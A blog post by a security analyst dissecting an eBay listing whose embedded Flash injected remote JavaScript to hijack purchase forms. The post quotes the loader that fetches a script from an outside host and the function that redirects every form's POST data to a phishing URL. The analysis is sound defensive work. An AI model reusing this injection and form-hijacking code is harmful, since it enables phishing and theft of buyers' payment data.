While reading the slashdot fire hose, I came across a post regarding possible fraud on eBay. I did a skim of the issue and quickly figured out what was going on. However, there seems to be more then just a simple over site.
When going to said item on eBay, after a few seconds the item id would change - if it wasn't for that, no one would be the wiser. It seems in the item details there is two pieces of flash, which is allowed by eBay. Both of these files are referenced using general obscurification by masking an IP address using its decimal equivalent. I downloaded these flash files and ran them though a few decompilers I have access too (being a Information Security Analyst has its perks). In all cases the files were so optimized I couldn't get any clean data from a decompile. My next trick, I ran the SWF files by them selves in IE (hey, it's good for something), which produced a JavaScript error.
Interesting, we have JavaScript in a SWF file. Doing a debug on the results allowed me to see the error in plan view. The flash file was trying to add a new script file to the top of the document body. Since there was no document body, IE barfed.
{ var e = document.createElement("SCRIPT");e.src ='http://www.bestofstate.org/010807/images/_notes/scrpt.js';e.type="text/javascript"; document.getElementsByTagName("head")[0].appendChild(e);if (start()); }
Taking the next step, I pulled down the script file, and lo-and-behold, this nice little script changes the POST data on the buy it now form (and some others) to a separate website, thus an unsuspecting user would not even notice his advancement away from eBay! (See snipit)
function posturi() { var d=document; var fl = d.forms.length for (var f=0; f<fl; f++) { if ((d.forms[f].name != "headerSearch") && (d.forms[f].name != "ListItemForSale") && (d.forms[f].name != "watch_thisItem")) { d.forms[f].action = 'http://www.szeskostelec.cz/.fw/ws/BuyConfirm.php?pret='+_xmyPrice+''; d.forms[f].onSubmit = ''; d.forms[f].method = ''; } } setTimeout('posturi()', 1000); } posturi();
Fortunatly, the site it's referancing has already been marked as a phish - Unfortunatly, not all browsers know to check these databases.
This has some other concerns, any site could be exploited by this - it may not allow script tags, however, if you allow flash, to be included, your still open to issues.
